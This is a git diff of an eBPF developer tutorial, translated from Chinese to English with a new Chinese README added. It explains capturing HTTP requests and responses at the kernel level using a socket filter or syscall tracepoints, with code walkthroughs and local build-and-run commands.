-这段代码用于计算TCP头部的长度。它加载TCP头部中的数据偏移字段(Data Offset,也称为头部长度字段),该字段表示TCP头部的长度以4字节为单位。代码将偏移字段的高四位清零,然后将其右移4位,最后乘以4,得到TCP头部的实际长度。
+This piece of code calculates the length of the TCP header. It loads the byte containing the Data Offset field (also known as the Header Length field), which expresses the TCP header length in units of 4 bytes in its upper four bits. The code masks the byte with `& 0xf0` to clear the low, reserved bits, shifts the result right by 4, and finally multiplies by 4 to obtain the TCP header length in bytes.

-需要了解:
+Key points to understand:

-- TCP头部(TCP Header):TCP头部包含了TCP协议相关的信息,如源端口、目标端口、序列号、确认号、标志位(如SYN、ACK、FIN等)、窗口大小和校验和等。
+- TCP Header: The TCP header contains information related to the TCP protocol, such as source port, destination port, sequence number, acknowledgment number, flags (e.g., SYN, ACK, FIN), window size, and checksum.

 ```c
 payload_offset = ETH_HLEN + hdr_len + doff;
 payload_length = __bpf_ntohs(tlen) - hdr_len - doff;
 ```

-这两行代码计算HTTP请求的载荷(payload)的偏移量和长度。它们将以太网帧头部长度、IP头部长度和TCP头部长度相加,得到HTTP请求的数据部分的偏移量,然后通过减去总长度、IP头部长度和TCP头部长度,计算出HTTP请求数据的长度。
+These two lines of code calculate the offset and length of the HTTP request payload.
They add the lengths of the Ethernet frame header, IP header, and TCP header together to obtain the offset of the HTTP data within the frame; the payload length is then obtained by subtracting the IP header length (`hdr_len`) and the TCP header length (`doff`) from the IP total length (`tlen`). As a quick sanity check, for a frame with no IP or TCP options (IHL 5, data offset 5), the payload starts 14 + 20 + 20 = 54 bytes into the frame, and a total length of 100 yields 100 - 20 - 20 = 60 payload bytes.

-需要了解:
+Key point:

-- HTTP请求载荷(Payload):HTTP请求中包含的实际数据部分,通常是HTTP请求头和请求体。
+- HTTP Request Payload: The actual data portion included in an HTTP request, typically consisting of the HTTP request headers and request body.

 ```c
 char line_buffer[7];
@@ -361,7 +350,7 @@ bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7);
 bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer);
 ```

-这部分代码用于加载HTTP请求行的前7个字节,存储在名为`line_buffer`的字符数组中。然后,它检查HTTP请求数据的长度是否小于7字节或偏移量是否为负数,如果满足这些条件,说明HTTP请求不完整,直接返回0。最后,它使用`bpf_printk`函数将HTTP请求行的内容打印到内核日志中,以供调试和分析。
+This portion of the code first checks that the payload is at least 7 bytes long and that the offset is valid; anything shorter cannot hold a complete request-line prefix and is skipped by returning 0. It then loads the first 7 bytes of the HTTP request line into a character array named `line_buffer` and uses the `bpf_printk` function to print them to the kernel trace log for debugging and analysis.

 ```c
 if (bpf_strncmp(line_buffer, 3, "GET") != 0 &&
@@ -374,9 +363,9 @@ if (bpf_strncmp(line_buffer, 3, "GET") != 0 &&
 }
 ```

-> 注意:bpf_strncmp 这个内核 helper 在 5.17 版本中才被引入,如果你的内核版本低于 5.17,可以手动匹配字符串来实现相同的功能。
+> Note: The `bpf_strncmp` helper was introduced in kernel version 5.17. On earlier kernels, you can compare the bytes manually to achieve the same effect.

-这段代码使用`bpf_strncmp`函数比较`line_buffer`中的数据与HTTP请求方法(GET、POST、PUT、DELETE、HTTP)是否匹配。如果不匹配,说明不是HTTP请求,直接返回0,放弃处理。
+This piece of code uses the `bpf_strncmp` function to compare the data in `line_buffer` against the HTTP method names (GET, POST, PUT, DELETE) and the `HTTP` prefix that marks responses such as `HTTP/1.1 200 OK`. If none of them match, the data is not HTTP traffic, and the function returns 0 so the packet is ignored.

 ```c
 e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
@@ -384,11 +373,11 @@ if (!e)
 return 0;
 ```

-这部分代码尝试从BPF环形缓冲区中保留一块内存以存储事件信息。如果无法保留内存块,返回0。BPF环形缓冲区用于在eBPF程序和用户空间之间传递事件数据。
+This section of the code attempts to reserve a block of memory from the BPF ring buffer to store event information. If it cannot reserve the memory block, it returns 0. The BPF ring buffer is used to pass event data between the eBPF program and user space.

-需要了解:
+Key point:

-- BPF环形缓冲区:BPF环形缓冲区是一种在eBPF程序和用户空间之间传递数据的机制。它可以用来存储事件信息,以便用户空间应用程序进行进一步处理或分析。
+- BPF Ring Buffer: The BPF ring buffer is a mechanism for passing data between eBPF programs and user space. It can be used to store event information for further processing or analysis by user space applications.

 ```c
 e->ip_proto = ip_proto;
@@ -406,53 +395,51 @@ bpf_ringbuf_submit(e, 0);
 return skb->len;
 ```

-最后,这段代码将捕获到的事件信息存储在`e`结构体中,并将
+Finally, this code segment stores the captured event information in the `e` structure and submits it to the BPF ring buffer. It includes information such as the captured IP protocol, source and destination ports, packet type, interface index, payload length, source IP address, and destination IP address. It then returns the full length of the packet (`skb->len`), which passes the packet through to the attached socket unmodified.
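+
+One detail that is easy to miss (it comes from the general contract of the socket filter program type, inherited from classic BPF, rather than from anything specific to this example): the value returned by a socket filter is the number of bytes of each packet that the kernel delivers to the attached socket. Returning `skb->len` therefore passes the whole packet through, a smaller value truncates it, and 0 hides the packet from that socket entirely, as in this minimal sketch:
+
+```c
+/* Hypothetical filter for illustration only: deliver zero bytes of
+ * every packet, so the attached socket receives nothing at all. */
+SEC("socket")
+int drop_all(struct __sk_buff *skb)
+{
+	return 0;
+}
+```
+
+Note that this only affects what the attached raw socket sees; it does not drop the packet for the rest of the system.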
-其提交到BPF环形缓冲区。它包括了捕获的IP协议、源端口和目标端口、数据包类型、接口索引、载荷长度、源IP地址和目标IP地址等信息。最后,它返回数据包的长度,表示成功处理了数据包。 +This code is primarily used to store captured event information for further processing. The BPF ring buffer is used to pass this information to user space for additional handling or logging. -这段代码主要用于将捕获的事件信息存储起来,以便后续的处理和分析。 BPF环形缓冲区用于将这些信息传递到用户空间,供用户空间应用程序进一步处理或记录。 +In summary, this eBPF program's main task is to capture HTTP requests. It accomplishes this by parsing the Ethernet frame, IP header, and TCP header of incoming packets to determine if they contain HTTP requests. Information about the requests is then stored in the `so_event` structure and submitted to the BPF ring buffer. This is an efficient method for capturing HTTP traffic at the kernel level and is suitable for applications such as network monitoring and security analysis. -总结:这段eBPF程序的主要任务是捕获HTTP请求,它通过解析数据包的以太网帧、IP头部和TCP头部来确定数据包是否包含HTTP请求,并将有关请求的信息存储在`so_event`结构体中,然后提交到BPF环形缓冲区。这是一种高效的方法,可以在内核层面捕获HTTP流量,适用于网络监控和安全分析等应用。 +### Potential Limitations -### 潜在缺陷 +The above code has some potential limitations, and one of the main limitations is that it cannot handle URLs that span multiple packets. -上述代码也存在一些潜在的缺陷,其中一个主要缺陷是它无法处理跨多个数据包的URL。 +- Cross-Packet URLs: The code checks the URL in an HTTP request by parsing a single data packet. If the URL of an HTTP request spans multiple packets, it will only examine the URL in the first packet. This can lead to missing or partially capturing long URLs that span multiple data packets. -- 跨包URL:代码中通过解析单个数据包来检查HTTP请求中的URL,如果HTTP请求的URL跨足够多的数据包,那么只会检查第一个数据包中的URL部分。这会导致丢失或部分记录那些跨多个数据包的长URL。 +To address this issue, a solution often involves reassembling multiple packets to reconstruct the complete HTTP request. This may require implementing packet caching and assembly logic within the eBPF program and waiting to collect all relevant packets until the HTTP request is detected. This adds complexity and may require additional memory to handle cases where URLs span multiple packets. -解决这个问题的方法通常需要对多个数据包进行重新组装,以还原完整的HTTP请求。这可能需要在eBPF程序中实现数据包的缓存和组装逻辑,并在检测到HTTP请求结束之前等待并收集所有相关数据包。这需要更复杂的逻辑和额外的内存来处理跨多个数据包的情况。 +### User-Space Code -### 用户态代码 - -用户态代码的主要目的是创建一个原始套接字(raw socket),然后将先前在内核中定义的eBPF程序附加到该套接字上,从而允许eBPF程序捕获和处理从该套接字接收到的网络数据包,例如: +The user-space code's main purpose is to create a raw socket and then attach the previously defined eBPF program in the kernel to that socket, allowing the eBPF program to capture and process network packets received on that socket. Here's an example of the user-space code: ```c - /* Create raw socket for localhost interface */ - sock = open_raw_sock(interface); - if (sock < 0) { - err = -2; - fprintf(stderr, "Failed to open raw socket\n"); - goto cleanup; - } +/* Create raw socket for localhost interface */ +sock = open_raw_sock(interface); +if (sock < 0) { + err = -2; + fprintf(stderr, "Failed to open raw socket\n"); + goto cleanup; +} - /* Attach BPF program to raw socket */ - prog_fd = bpf_program__fd(skel->progs.socket_handler); - if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { - err = -3; - fprintf(stderr, "Failed to attach to raw socket\n"); - goto cleanup; - } +/* Attach BPF program to raw socket */ +prog_fd = bpf_program__fd(skel->progs.socket_handler); +if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { + err = -3; + fprintf(stderr, "Failed to attach to raw socket\n"); + goto cleanup; +} ``` -1. 
`sock = open_raw_sock(interface);`:这行代码调用了一个自定义的函数`open_raw_sock`,该函数用于创建一个原始套接字。原始套接字允许用户态应用程序直接处理网络数据包,而不经过协议栈的处理。函数`open_raw_sock`可能需要一个参数 `interface`,用于指定网络接口,以便确定从哪个接口接收数据包。如果创建套接字失败,它将返回一个负数,否则返回套接字的文件描述符`sock`。 -2. 如果`sock`的值小于0,表示打开原始套接字失败,那么将`err`设置为-2,并在标准错误流上输出一条错误信息。 -3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`:这行代码获取之前在eBPF程序定义中的套接字过滤器程序(`socket_handler`)的文件描述符,以便后续将它附加到套接字上。`skel`是一个eBPF程序对象的指针,可以通过它来访问程序集合。 -4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`:这行代码使用`setsockopt`系统调用将eBPF程序附加到原始套接字。它设置了`SO_ATTACH_BPF`选项,将eBPF程序的文件描述符传递给该选项,以便内核知道要将哪个eBPF程序应用于这个套接字。如果附加成功,套接字将开始捕获和处理从中接收到的网络数据包。 -5. 如果`setsockopt`失败,它将`err`设置为-3,并在标准错误流上输出一条错误信息。 +1. `sock = open_raw_sock(interface);`: This line of code calls a custom function `open_raw_sock`, which is used to create a raw socket. Raw sockets allow a user-space application to handle network packets directly without going through the protocol stack. The `interface` parameter might specify the network interface from which to receive packets, determining where to capture packets from. If creating the socket fails, it returns a negative value, otherwise, it returns the file descriptor of the socket `sock`. +2. If the value of `sock` is less than 0, indicating a failure to open the raw socket, it sets `err` to -2 and prints an error message on the standard error stream. +3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`: This line of code retrieves the file descriptor of the socket filter program (`socket_handler`) previously defined in the eBPF program. It is necessary to attach this program to the socket. `skel` is a pointer to an eBPF program object, and it provides access to the program collection. +4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`: This line of code uses the `setsockopt` system call to attach the eBPF program to the raw socket. It sets the `SO_ATTACH_BPF` option and passes the file descriptor of the eBPF program to the option, letting the kernel know which eBPF program to apply to this socket. If the attachment is successful, the socket starts capturing and processing network packets received on it. +5. If `setsockopt` fails, it sets `err` to -3 and prints an error message on the standard error stream. -### 编译运行 +### Compilation and Execution -完整的源代码可以在 中找到。关于如何安装依赖,请参考: 编译运行上述代码: +The complete source code can be found at . To compile and run the code: ```console $ git submodule update --init --recursive @@ -465,7 +452,7 @@ $ sudo ./sockfilter ... ``` -在另外一个窗口中,使用 python 启动一个简单的 web server: +In another terminal, start a simple web server using Python: ```console python3 -m http.server @@ -473,7 +460,7 @@ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - ``` -可以使用 curl 发起请求: +You can use `curl` to make requests: ```c $ curl http://0.0.0.0:8000/ @@ -485,7 +472,7 @@ $ curl http://0.0.0.0:8000/ .... ``` -在 eBPF 程序中,可以看到打印出了 HTTP 请求的内容: +In the eBPF program, you can see that it prints the content of HTTP requests: ```console 127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) @@ -499,11 +486,11 @@ Server: SimpleHTTP/0.6 Python/3.11.4 ... ``` -分别包含了请求和响应的内容。 +It captures both request and response content. 
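+
+For completeness, the output above is produced by the user-space half of the program draining the same BPF ring buffer that the kernel program submits to. The exact definitions live in the repository sources; the sketch below is a reconstruction, where the `so_event` layout is inferred from the fields the kernel code fills in and `MAX_BUF_SIZE` is an assumed capture size:
+
+```c
+#include <arpa/inet.h>
+#include <linux/types.h>
+#include <stdio.h>
+
+#define MAX_BUF_SIZE 64 /* assumed; must match the kernel-side definition */
+
+/* Event layout inferred from the kernel-side field accesses. */
+struct so_event {
+	__be32 src_addr;
+	__be32 dst_addr;
+	union {
+		__be32 ports;
+		__be16 port16[2]; /* [0] = source port, [1] = destination port */
+	};
+	__u32 ip_proto;
+	__u32 pkt_type;
+	__u32 ifindex;
+	__u32 payload_length;
+	__u8 payload[MAX_BUF_SIZE];
+};
+
+/* Callback invoked by libbpf for every event submitted with
+ * bpf_ringbuf_submit() on the kernel side. */
+static int handle_event(void *ctx, void *data, size_t size)
+{
+	const struct so_event *e = data;
+	char src[16], dst[16];
+	/* Only MAX_BUF_SIZE bytes were captured even for longer payloads. */
+	int n = e->payload_length < MAX_BUF_SIZE ? e->payload_length
+						 : MAX_BUF_SIZE;
+
+	inet_ntop(AF_INET, &e->src_addr, src, sizeof(src));
+	inet_ntop(AF_INET, &e->dst_addr, dst, sizeof(dst));
+	printf("%s:%d(src) -> %s:%d(dst)\n", src, ntohs(e->port16[0]),
+	       dst, ntohs(e->port16[1]));
+	printf("payload: %.*s\n", n, e->payload);
+	return 0;
+}
+```
+
+With that callback in place, the main loop simply polls: `ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL)` creates the consumer, and `ring_buffer__poll(rb, 100)` is called repeatedly until the program is interrupted.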
-## 使用 eBPF syscall tracepoint 来捕获 HTTP 流量 +## Capturing HTTP Traffic Using eBPF Syscall Tracepoints -eBPF 提供了一种强大的机制,允许我们在内核级别追踪系统调用。在这个示例中,我们将使用 eBPF 追踪 accept 和 read 系统调用,以捕获 HTTP 流量。由于篇幅有限,这里我们仅仅对代码框架做简要的介绍。 +eBPF provides a powerful mechanism for tracing system calls at the kernel level. In this example, we'll use eBPF to trace the `accept` and `read` system calls to capture HTTP traffic. Due to space limitations, we'll provide a brief overview of the code framework. ```c struct @@ -514,24 +501,24 @@ struct __type(value, struct accept_args_t); } active_accept_args_map SEC(".maps"); -// 定义在 accept 系统调用入口的追踪点 +// Define a tracepoint at the entry of the accept system call SEC("tracepoint/syscalls/sys_enter_accept") int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) { u64 id = bpf_get_current_pid_tgid(); - // ... 获取和存储 accept 调用的参数 + // ... Get and store the arguments of the accept call bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); return 0; } -// 定义在 accept 系统调用退出的追踪点 +// Define a tracepoint at the exit of the accept system call SEC("tracepoint/syscalls/sys_exit_accept") int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) { - // ... 处理 accept 调用的结果 + // ... Process the result of the accept call struct accept_args_t *args = bpf_map_lookup_elem(&active_accept_args_map, &id); - // ... 获取和存储 accept 调用获得的 socket 文件描述符 + // ... Get and store the socket file descriptor obtained from the accept call __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); // ... @@ -545,26 +532,26 @@ struct __type(value, struct data_args_t); } active_read_args_map SEC(".maps"); -// 定义在 read 系统调用入口的追踪点 +// Define a tracepoint at the entry of the read system call SEC("tracepoint/syscalls/sys_enter_read") int sys_enter_read(struct trace_event_raw_sys_enter *ctx) { - // ... 获取和存储 read 调用的参数 + // ... Get and store the arguments of the read call bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); return 0; } -// 辅助函数,检查是否为 HTTP 连接 +// Helper function to check if it's an HTTP connection static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) { - // ... 检查数据是否为 HTTP 请求或响应 + // ... Check if the data is an HTTP request or response } -// 辅助函数,处理读取的数据 +// Helper function to process the read data static inline void process_data(struct trace_event_raw_sys_exit *ctx, u64 id, const struct data_args_t *args, u64 bytes_count) { - // ... 处理读取的数据,检查是否为 HTTP 流量,并发送事件 + // ... Process the read data, check if it's HTTP traffic, and send events if (is_http_connection(line_buffer, bytes_count)) { // ... @@ -575,11 +562,11 @@ static inline void process_data(struct trace_event_raw_sys_exit *ctx, } } -// 定义在 read 系统调用退出的追踪点 +// Define a tracepoint at the exit of the read system call SEC("tracepoint/syscalls/sys_exit_read") int sys_exit_read(struct trace_event_raw_sys_exit *ctx) { - // ... 处理 read 调用的结果 + // ... Process the result of the read call struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); if (read_args != NULL) { @@ -592,61 +579,61 @@ int sys_exit_read(struct trace_event_raw_sys_exit *ctx) char _license[] SEC("license") = "GPL"; ``` -这段代码简要展示了如何使用eBPF追踪Linux内核中的系统调用来捕获HTTP流量。以下是对代码的hook位置和流程的详细解释,以及需要hook哪些系统调用来实现完整的请求追踪: +This code briefly demonstrates how to use eBPF to trace system calls in the Linux kernel to capture HTTP traffic. 
Here's a detailed explanation of the hook locations and the flow, as well as the complete set of system calls that need to be hooked for comprehensive request tracing: -### **Hook 位置和流程** +### Hook Locations and Flow -- 该代码使用了eBPF的Tracepoint功能,具体来说,它定义了一系列的eBPF程序,并将它们绑定到了特定的系统调用的Tracepoint上,以捕获这些系统调用的入口和退出事件。 +- The code uses eBPF Tracepoint functionality. Specifically, it defines a series of eBPF programs and binds them to specific system call Tracepoints to capture entry and exit events of these system calls. -- 首先,它定义了两个eBPF哈希映射(`active_accept_args_map`和`active_read_args_map`)来存储系统调用参数。这些映射用于跟踪`accept`和`read`系统调用。 +- First, it defines two eBPF hash maps (`active_accept_args_map` and `active_read_args_map`) to store system call parameters. These maps are used to track `accept` and `read` system calls. -- 接着,它定义了多个Tracepoint追踪程序,其中包括: - - `sys_enter_accept`:定义在`accept`系统调用的入口处,用于捕获`accept`系统调用的参数,并将它们存储在哈希映射中。 - - `sys_exit_accept`:定义在`accept`系统调用的退出处,用于处理`accept`系统调用的结果,包括获取和存储新的套接字文件描述符以及建立连接的相关信息。 - - `sys_enter_read`:定义在`read`系统调用的入口处,用于捕获`read`系统调用的参数,并将它们存储在哈希映射中。 - - `sys_exit_read`:定义在`read`系统调用的退出处,用于处理`read`系统调用的结果,包括检查读取的数据是否为HTTP流量,如果是,则发送事件。 +- Next, it defines multiple Tracepoint tracing programs, including: + - `sys_enter_accept`: Defined at the entry of the `accept` system call, used to capture the arguments of the `accept` system call and store them in the hash map. + - `sys_exit_accept`: Defined at the exit of the `accept` system call, used to process the result of the `accept` system call, including obtaining and storing the new socket file descriptor and related connection information. + - `sys_enter_read`: Defined at the entry of the `read` system call, used to capture the arguments of the `read` system call and store them in the hash map. + - `sys_exit_read`: Defined at the exit of the `read` system call, used to process the result of the `read` system call, including checking if the read data is HTTP traffic and sending events. -- 在`sys_exit_accept`和`sys_exit_read`中,还涉及一些数据处理和事件发送的逻辑,例如检查数据是否为HTTP连接,组装事件数据,并使用`bpf_perf_event_output`将事件发送到用户空间供进一步处理。 +- In `sys_exit_accept` and `sys_exit_read`, there is also some data processing and event sending logic, such as checking if the data is an HTTP connection, assembling event data, and using `bpf_perf_event_output` to send events to user space for further processing. -### **需要 Hook 的完整系统调用** +### Complete Set of System Calls to Hook -要实现完整的HTTP请求追踪,通常需要hook的系统调用包括: +To fully implement HTTP request tracing, the system calls that typically need to be hooked include: -- `socket`:用于捕获套接字创建,以追踪新的连接。 -- `bind`:用于获取绑定的端口信息。 -- `listen`:用于开始监听连接请求。 -- `accept`:用于接受连接请求,获取新的套接字文件描述符。 -- `read`:用于捕获接收到的数据,以检查其中是否包含 HTTP 请求。 -- `write`:用于捕获发送的数据,以检查其中是否包含 HTTP 响应。 +- `socket`: Used to capture socket creation for tracking new connections. +- `bind`: Used to obtain port information where the socket is bound. +- `listen`: Used to start listening for connection requests. +- `accept`: Used to accept connection requests and obtain new socket file descriptors. +- `read`: Used to capture received data and check if it contains HTTP requests. +- `write`: Used to capture sent data and check if it contains HTTP responses. -上述代码已经涵盖了`accept`和`read`系统调用的追踪。要完整实现HTTP请求的追踪,还需要hook其他系统调用,并实现相应的逻辑来处理这些系统调用的参数和结果。 +The provided code already covers the tracing of `accept` and `read` system calls. 
To complete HTTP request tracing, additional system calls need to be hooked, and corresponding logic needs to be implemented to handle the parameters and results of these system calls. -完整的源代码可以在 中找到。 +The complete source code can be found at . -## 总结 +## Summary -在当今复杂的技术环境中,系统的可观测性变得至关重要,特别是在微服务和云原生应用程序的背景下。本文探讨了如何利用eBPF技术来追踪七层协议,以及在这个过程中可能面临的挑战和解决方案。以下是对本文内容的总结: +In today's complex technological landscape, system observability has become crucial, especially in the context of microservices and cloud-native applications. This article explores how to leverage eBPF technology for tracing the seven-layer protocols, along with the challenges and solutions that may arise in this process. Here's a summary of the content covered in this article: -1. **背景介绍**: - - 现代应用程序通常由多个微服务和分布式组件组成,因此观测整个系统的行为至关重要。 - - 七层协议(如HTTP、gRPC、MQTT等)提供了深入了解应用程序交互的详细信息,但监控这些协议通常具有挑战性。 +1. **Introduction**: + - Modern applications often consist of multiple microservices and distributed components, making it essential to observe the behavior of the entire system. + - Seven-layer protocols (such as HTTP, gRPC, MQTT, etc.) provide detailed insights into application interactions, but monitoring these protocols can be challenging. -2. **eBPF技术的作用**: - - eBPF允许开发者在不修改或插入应用程序代码的情况下,深入内核层来实时观测和分析系统行为。 - - eBPF技术为监控七层协议提供了一个强大的工具,特别适用于微服务环境。 +2. **Role of eBPF Technology**: + - eBPF allows developers to dive deep into the kernel layer for real-time observation and analysis of system behavior without modifying or inserting application code. + - eBPF technology offers a powerful tool for monitoring seven-layer protocols, especially in a microservices environment. -3. **追踪七层协议**: - - 本文介绍了如何追踪HTTP等七层协议的挑战,包括协议的复杂性和动态性。 - - 传统的网络监控工具难以应对七层协议的复杂性。 +3. **Tracing Seven-Layer Protocols**: + - The article discusses the challenges of tracing seven-layer protocols, including their complexity and dynamism. + - Traditional network monitoring tools struggle with the complexity of seven-layer protocols. -4. **eBPF的应用**: - - eBPF提供两种主要方法来追踪七层协议:socket filter和syscall trace。 - - 这两种方法可以帮助捕获HTTP等协议的网络请求数据,并分析它们。 +4. **Applications of eBPF**: + - eBPF provides two primary methods for tracing seven-layer protocols: socket filters and syscall tracing. + - Both of these methods help capture network request data for protocols like HTTP and analyze them. -5. **eBPF实践教程**: - - 本文提供了一个实际的eBPF教程,演示如何使用eBPF socket filter或syscall trace来捕获和分析HTTP流量。 - - 教程内容包括开发eBPF程序、使用eBPF工具链和实施HTTP请求的追踪。 +5. **eBPF Practical Tutorial**: + - The article provides a practical eBPF tutorial demonstrating how to capture and analyze HTTP traffic using eBPF socket filters or syscall tracing. + - The tutorial covers the development of eBPF programs, the use of the eBPF toolchain, and the implementation of HTTP request tracing. -通过这篇文章,读者可以获得深入了解如何使用eBPF技术来追踪七层协议,尤其是HTTP流量的知识。这将有助于更好地监控和分析网络流量,从而提高应用程序性能和安全性。如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +Through this article, readers can gain a deep understanding of how to use eBPF technology for tracing seven-layer protocols, particularly HTTP traffic. This knowledge will help enhance the monitoring and analysis of network traffic, thereby improving application performance and security. If you're interested in learning more about eBPF and its practical applications, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. 
-> 原文地址: 转载请注明出处。 +> The original link of this article: diff --git a/src/23-http/README.zh.md b/src/23-http/README.zh.md new file mode 100644 index 0000000..a6d1104 --- /dev/null +++ b/src/23-http/README.zh.md @@ -0,0 +1,652 @@ +# 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 + +在当今的技术环境中,随着微服务、云原生应用和复杂的分布式系统的崛起,系统的可观测性已成为确保其健康、性能和安全的关键要素。特别是在微服务架构中,应用程序的组件可能分布在多个容器和服务器上,这使得传统的监控方法往往难以提供足够的深度和广度来全面了解系统的行为。这就是为什么观测七层协议,如 HTTP、gRPC、MQTT 等,变得尤为重要。 + +七层协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。在微服务环境中,了解这些交互是至关重要的,因为它们经常是性能瓶颈、故障和安全问题的根源。然而,监控这些协议并不简单。传统的网络监控工具,如 tcpdump,虽然在捕获网络流量方面非常有效,但在处理七层协议的复杂性和动态性时,它们往往显得力不从心。 + +这正是 eBPF 技术发挥作用的地方。eBPF 允许开发者和运维人员深入到系统的内核层,实时观测和分析系统的行为,而无需对应用程序代码进行任何修改或插入埋点。这为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务环境中。 + +在本教程中,我们将深入探讨以下内容: + +- 追踪七层协议,如 HTTP,以及与其相关的挑战。 +- eBPF 的 socket filter 和 syscall 追踪:这两种技术如何帮助我们在不同的内核层次追踪 HTTP 网络请求数据,以及这两种方法的优势和局限性。 +- eBPF 实践教程:如何开发一个 eBPF 程序,使用 eBPF socket filter 或 syscall 追踪来捕获和分析 HTTP 流量 + +随着网络流量的增加和应用程序的复杂性增加,对七层协议的深入了解变得越来越重要。通过本教程,您将获得必要的知识和工具,以便更有效地监控和分析您的网络流量,从而为您的应用程序和服务器提供最佳的性能。 + +本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## 追踪 HTTP, HTTP/2 等七层协议的挑战 + +在现代的网络环境中,七层协议不仅仅局限于 HTTP。实际上,有许多七层协议,如 HTTP/2, gRPC, MQTT, WebSocket, AMQP 和 SMTP,它们都在不同的应用场景中发挥着关键作用。这些协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。但是,追踪这些协议并不是一个简单的任务,尤其是在复杂的分布式系统中。 + +1. **多样性和复杂性**:每种七层协议都有其特定的设计和工作原理。例如,gRPC 使用了 HTTP/2 作为其传输协议,并支持多种语言。而 MQTT 是为低带宽和不可靠的网络设计的轻量级发布/订阅消息传输协议。 + +2. **动态性**:许多七层协议都是动态的,这意味着它们的行为可能会根据网络条件、应用需求或其他因素而变化。 + +3. **加密和安全性**:随着安全意识的增强,许多七层协议都采用了加密技术,如 TLS/SSL。这为追踪和分析带来了额外的挑战,因为需要解密流量才能进行深入的分析。 + +4. **高性能需求**:在高流量的生产环境中,捕获和分析七层协议的流量可能会对系统性能产生影响。传统的网络监控工具可能无法处理大量的并发会话。 + +5. **数据的完整性和连续性**:与 tcpdump 这样的工具只捕获单独的数据包不同,追踪七层协议需要捕获完整的会话,这可能涉及多个数据包。这要求工具能够正确地重组和解析这些数据包,以提供连续的会话视图。 + +6. **代码侵入性**:为了深入了解七层协议的行为,开发人员可能需要修改应用程序代码以添加监控功能。这不仅增加了开发和维护的复杂性,而且可能会影响应用程序的性能。 + +正如上文所述,eBPF 提供了一个强大的解决方案,允许我们在内核层面捕获和分析七层协议的流量,而无需对应用程序进行任何修改。这种方法为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务和分布式环境中。 + +在处理网络流量和系统行为时,选择在内核态而非用户态进行处理有其独特的优势。首先,内核态处理可以直接访问系统资源和硬件,从而提供更高的性能和效率。其次,由于内核是操作系统的核心部分,它可以提供对系统行为的全面视图,而不受任何用户空间应用程序的限制。 + +**无插桩追踪("zero-instrumentation observability")**的优势如下: + +1. **性能开销小**:由于不需要修改或添加额外的代码到应用程序中,所以对性能的影响最小化。 +2. **透明性**:开发者和运维人员不需要知道应用程序的内部工作原理,也不需要访问源代码。 +3. **灵活性**:可以轻松地在不同的环境和应用程序中部署和使用,无需进行任何特定的配置或修改。 +4. 
**安全性**:由于不需要修改应用程序代码,所以降低了引入潜在安全漏洞的风险。 + +利用 eBPF 在内核态进行无插桩追踪,我们可以实时捕获和分析系统的行为,而不需要对应用程序进行任何修改。这种方法不仅提供了对系统深入的洞察力,而且确保了最佳的性能和效率。这是为什么 eBPF 成为现代可观测性工具的首选技术,特别是在需要高性能和低延迟的生产环境中。 + +## eBPF 中的 socket filter 与 syscall 追踪:深入解析与比较 + +### **eBPF Socket Filter** + +**是什么?** +eBPF socket filter 是经典的 Berkeley Packet Filter (BPF) 的扩展,允许在内核中直接进行更高级的数据包过滤。它在套接字层操作,使得可以精细地控制哪些数据包被用户空间应用程序处理。 + +**主要特点:** + +- **性能**:通过在内核中直接处理数据包,eBPF socket filters 减少了用户和内核空间之间的上下文切换的开销。 +- **灵活性**:eBPF socket filters 可以附加到任何套接字,为各种协议和套接字类型提供了通用的数据包过滤机制。 +- **可编程性**:开发者可以编写自定义的 eBPF 程序来定义复杂的过滤逻辑,超越简单的数据包匹配。 + +**用途:** + +- **流量控制**:根据自定义条件限制或优先处理流量。 +- **安全性**:在它们到达用户空间应用程序之前丢弃恶意数据包。 +- **监控**:捕获特定数据包进行分析,而不影响其它流量。 + +### **eBPF Syscall Tracing** + +**是什么?** +使用 eBPF 进行的系统调用跟踪允许监视和操作应用程序发出的系统调用。系统调用是用户空间应用程序与内核交互的主要机制,因此跟踪它们可以深入了解应用程序的行为。 + +**主要特点:** + +- **粒度**:eBPF 允许跟踪特定的系统调用,甚至是这些系统调用中的特定参数。 +- **低开销**:与其他跟踪方法相比,eBPF 系统调用跟踪旨在具有最小的性能影响。 +- **安全性**:内核验证 eBPF 程序,以确保它们不会损害系统稳定性。 + +**工作原理:** +eBPF 系统调用跟踪通常涉及将 eBPF 程序附加到与系统调用相关的 tracepoints 或 kprobes。当跟踪的系统调用被调用时,执行 eBPF 程序,允许收集数据或甚至修改系统调用参数。 + +### eBPF 的 socket filter 和 